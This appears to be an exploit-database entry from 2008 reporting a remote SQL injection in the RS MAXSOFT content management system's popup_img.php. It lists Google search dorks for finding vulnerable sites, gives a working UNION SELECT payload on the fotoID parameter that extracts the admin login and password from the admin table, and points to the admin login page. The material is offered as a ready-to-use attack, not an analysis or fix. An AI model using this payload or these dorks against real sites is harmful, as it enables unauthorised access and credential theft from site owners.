id: 2865
date: 04/09/2008
title: RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

====================================================================
RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability
====================================================================




##########################################
#
# Provozovano na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozovano na RS MAXSOFT"
#
###########################################
you will see adminname and password on title

EXPLOiT:

modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin


ADMiN LOGiN=admin.php?page=logfrm


###########################################



#  0day.today [2023-03-26]  #